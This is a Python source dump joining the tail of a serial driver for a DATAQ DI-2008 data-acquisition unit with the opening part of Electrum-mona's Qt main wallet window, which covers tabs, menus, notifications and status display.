        raise ValueError('DI-2008 not found on bus')

    def _send_cmd(self, command: str):
        # commands are carriage-return-terminated ASCII
        self._logger.debug(f'sending "{command}"')
        self._serial_port.write(f'{command}\r'.encode())

    def _parse_received(self, received):
        self._logger.debug(f'received from unit: "{received}"')
        if self._scanning:
            # scan mode: the stream is a sequence of 16-bit little-endian
            # signed samples, routed to the scan-list ports in round-robin
            # order starting at self._scan_index
            for i in range(len(received) >> 1):
                int_value = received[i*2] + received[i*2+1] * 256
                if int_value > 32767:
                    # fold into the negative range (two's complement)
                    int_value = int_value - 65536
                self._ports[self._scan_index].parse(int_value)
                self._scan_index += 1
                self._scan_index %= len(self._ports)
        else:
            # strip the '0x00' from the received data in non-scan
            # mode - it only causes problems
            self._raw += [chr(b) for b in received if b != 0]

            # split the accumulated characters into '\r'-terminated messages
            messages = []
            while '\r' in self._raw:
                self._logger.debug('"\\r" detected, decoding message...')
                end_index = self._raw.index('\r')
                message = ''.join(self._raw[:end_index])
                messages.append(message)
                self._logger.debug(f'message received: "{message}"')
                # the slice starts at the '\r' found above, so the pop below
                # always removes exactly that terminator
                self._raw = self._raw[end_index:]
                if self._raw[0] == '\r':
                    self._raw.pop(0)

            for message in messages:
                if 'info' in message:
                    self._parse_info(message)
                elif 'din' in message:
                    self._parse_din(message)
                else:
                    self._logger.info(f'message could not be parsed: "{message}"')

    def _parse_info(self, message):
        if 'info' not in message:
            return

        # make numbers to data
        if 'info 0' in message:
            self._manufacturer = message.split('info 0')[-1].strip()
            # release the port if this is not a DATAQ instrument
            if self._manufacturer != 'DATAQ':
                self.close()
        elif
'info 1' in message: self._pid = message.split('info 1')[-1].strip() if self._pid != '2008': self.close() elif 'info 2' in message: self._firmware = message.split('info 2')[-1].strip() elif 'info 6' in message: self._esn = message.split('info 6')[-1].strip() else: self._logger.warning(f'info message not understood: "{message}"') def _parse_din(self, message): number = int(message.split(' ')[-1].strip()) for i, port in enumerate(self._dio): if port.direction == DigitalDirection.INPUT: if (number & (1 << i)) > 0: port.value = True else: port.value = False self._logger.debug(f'digital {port} is {port.value}') def _maintain_send_queue(self): if len(self._command_queue) > 0: command = self._command_queue.pop(0) if 'start' in command: self._scanning = True self._scan_index = 0 elif 'stop' in command: self._scanning = False # collect the dout commands and only send the most recent if 'dout' in command: dout_indexes = [] for i, cmd in enumerate(self._command_queue): if 'dout' in cmd: dout_indexes.append(i) if len(dout_indexes) == 0: self._send_cmd(command) return command = self._command_queue[dout_indexes[-1]] self._command_queue = [c for c in self._command_queue if 'dout' not in c] self._send_cmd(command) else: self._send_cmd(command) else: # when there is nothing else to do, poll the digital inputs... self._command_queue.append('din') def _run(self): while self._serial_port: try: waiting = self._serial_port.in_waiting except SerialException as e: break if waiting > 0: raw = self._serial_port.read(waiting) self._parse_received(raw) self._maintain_send_queue() sleep(self._timeout) if __name__ == '__main__': logging.basicConfig(level=logging.DEBUG) print(_discover_by_esn('5C76AEFA')) print(_discover_by_esn('5D3F3a15')) print(_discover_auto())
# ---- begin concatenated file: main_window.py (Electrum-mona GUI) ----
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
import sys import time import threading import os import traceback import json import shutil import weakref import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional, TYPE_CHECKING from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QMenu, QSizePolicy, QStatusBar) import electrum_mona from electrum_mona import (keystore, simple_config, ecc, constants, util, bitcoin, commands, coinchooser, paymentrequest) from electrum_mona.bitcoin import COIN, is_address, TYPE_ADDRESS from electrum_mona.plugin import run_hook from electrum_mona.i18n import _ from electrum_mona.util import (format_time, format_satoshis, format_fee_satoshis, format_satoshis_plain, NotEnoughFunds, UserCancelled, NoDynamicFeeEstimates, profiler, export_meta, import_meta, bh2u, bfh, InvalidPassword, base_units, base_units_list, base_unit_name_to_decimal_point, decimal_point_to_base_unit_name, quantize_feerate, UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI, InvoiceError) from electrum_mona.util import PR_TYPE_ONCHAIN, PR_TYPE_LN from electrum_mona.lnutil import PaymentFailure, SENT, RECEIVED from electrum_mona.transaction import Transaction, TxOutput from electrum_mona.address_synchronizer import AddTransactionException from electrum_mona.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet, sweep_preparations, InternalAddressCorruption) from electrum_mona.version import ELECTRUM_VERSION from electrum_mona.network import Network, TxBroadcastError, 
BestEffortRequestFailed from electrum_mona.exchange_rate import FxThread from electrum_mona.simple_config import SimpleConfig from electrum_mona.logging import Logger from electrum_mona.paymentrequest import PR_PAID from electrum_mona.util import pr_expiration_values from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui, filename_field, address_field, char_width_in_lineedit, webopen) from .util import ButtonsTextEdit from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread from .channels_list import ChannelsList if TYPE_CHECKING: from . 
import ElectrumGui LN_NUM_PAYMENT_ATTEMPTS = 10 class StatusBarButton(QPushButton): def __init__(self, icon, tooltip, func): QPushButton.__init__(self, icon, '') self.setToolTip(tooltip) self.setFlat(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() == Qt.Key_Return: self.func() class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() network_signal = pyqtSignal(str, object) #ln_payment_attempt_signal = pyqtSignal(str) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet): QMainWindow.__init__(self) self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network assert wallet, "no wallet" self.wallet = wallet self.fx = gui_object.daemon.fx # type: FxThread self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.payto_URI = None self.checking_accounts = False self.qr_window = None self.not_enough_funds = False self.pluginsdialog = None self.require_fee_update = False self.tl_windows = [] self.tx_external_keypairs = {} Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT) try: decimal_point_to_base_unit_name(self.decimal_point) except UnknownBaseUnit: 
self.decimal_point = DECIMAL_POINT_DEFAULT self.num_zeros = int(config.get('num_zeros', 0)) self.completions = QStringListModel() self.send_tab_is_onchain = False self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() self.channels_tab = self.create_channels_tab(wallet) tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") if self.config.get('lightning'): add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) self.setCentralWidget(tabs) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) 
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes', 'on_history', 'channel', 'channels', 'payment_received', 'payment_status'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... self.network.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) # update fee slider in case we missed the callback self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " + _("Would you like to be notified when there is a newer version of Electrum available?")) config.set_key('check_updates', bool(choice), save=True) if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. 
def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread(self) self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def setup_exception_hook(self): Exception_Hook(self) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. 
This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(repr(e)) def on_network(self, event, *args): # Handle in GUI thread self.network_signal.emit(event, args) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event == 'on_quotes': self.on_fx_quotes() elif event == 'on_history': self.on_fx_history() elif event == 'channels': self.channels_list.update_rows.emit() elif event == 
'channel': self.channels_list.update_single_row.emit(*args) self.update_status() elif event == 'payment_status': self.on_payment_status(*args) elif event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True elif event == 'fee_histogram': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True self.history_model.on_fee_histogram() elif event == 'payment_received': wallet, key, status = args if wallet == self.wallet: self.notify(_('Payment received') + '\n' + key) else: self.logger.info(f"unexpected network event: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) if wallet.lnworker: wallet.lnworker.on_channels_updated() self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.channels_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() 
self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.storage.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum-mona Testnet" if constants.net.TESTNET else "Electrum-mona" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.storage.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Bitcoins with it."), _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Bitcoin network. 
It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def backup_wallet(self): path = self.wallet.storage.path wallet_folder = os.path.dirname(path) filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) if not filename: return new_path = os.path.join(wallet_folder, filename) if new_path != path: try: shutil.copy2(path, new_path) self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created")) except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.wallet.storage.path)) def new_wallet(self): try: 
wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_master_public_keys) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) 
history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) if self.config.get('lightning'): add_toggle_action(view_menu, self.channels_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) tools_menu = menubar.addMenu(_("&Tools")) # Settings / Preferences are all reserved keywords in macOS using this as work around tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self)) if self.config.get('lightning'): tools_menu.addAction(_("&Lightning"), self.gui_object.show_lightning_dialog) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), 
def donate_to_server(self):
    """Open the Send tab pre-filled with the current server's donation address.

    Shows an error message instead of crashing when the wallet is running
    offline (``self.network is None`` — the same condition ``update_status``
    already handles) or when the server advertises no donation address.
    """
    if self.network is None:
        # Robustness fix: the window can exist without a network object
        # (offline mode); the original code would raise AttributeError here.
        self.show_error(_('You are offline.'))
        return
    d = self.network.get_donation_address()
    if d:
        host = self.network.get_parameters().host
        self.pay_to_URI('monacoin:%s?message=donation for %s'%(d, host))
    else:
        self.show_error(_('No donation address for this server'))
def notify_transactions(self):
    """Drain the incoming-tx queue and raise desktop notifications.

    Skipped while the wallet is still syncing, and rate-limited to one
    batch of notifications every 20 seconds.  Three or more pending
    transactions are collapsed into a single summary notification.
    """
    if self.tx_notification_queue.qsize() == 0:
        return
    if not self.wallet.up_to_date:
        return  # no notifications while syncing
    now = time.time()
    rate_limit = 20  # seconds
    if self.tx_notification_last_time + rate_limit > now:
        return
    self.tx_notification_last_time = now
    self.logger.info("Notifying GUI about new transactions")
    # Drain everything currently queued without blocking.
    pending = []
    while True:
        try:
            pending.append(self.tx_notification_queue.get_nowait())
        except queue.Empty:
            break
    if len(pending) >= 3:
        # Combine the transactions into one summary notification.
        total = 0
        for tx in pending:
            is_relevant, _is_mine, delta, _fee = self.wallet.get_wallet_delta(tx)
            if is_relevant:
                total += delta
        self.notify(_("{} new transactions: Total amount received in the new transactions {}")
                    .format(len(pending), self.format_amount_and_units(total)))
    else:
        for tx in pending:
            is_relevant, _is_mine, delta, _fee = self.wallet.get_wallet_delta(tx)
            if is_relevant:
                self.notify(_("New transaction: {}").format(self.format_amount_and_units(delta)))
def format_amount_and_units(self, amount):
    """Render *amount* in the wallet's base unit, appending the fiat value
    in parentheses when an exchange-rate provider (``self.fx``) is active."""
    text = '{} {}'.format(self.format_amount(amount), self.base_unit())
    fiat = self.fx.format_amount_and_units(amount) if self.fx else None
    if text and fiat:
        text = '{} ({})'.format(text, fiat)
    return text
self.decimal_point def base_unit(self): return decimal_point_to_base_unit_name(self.decimal_point) def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. 
if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) if self.wallet.lnworker: l = self.wallet.lnworker.get_balance() text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.update_completions() def create_channels_tab(self, wallet): self.channels_list = ChannelsList(self) t = self.channels_list.get_toolbar() return self.create_list_tab(self.channels_list, t) def 
create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_history', False)) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_transaction(self, tx, tx_desc = None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, self, tx_desc) def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 0, 0) grid.addWidget(self.receive_message_e, 0, 1, 1, 4) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 1, 0) grid.addWidget(self.receive_amount_e, 1, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) 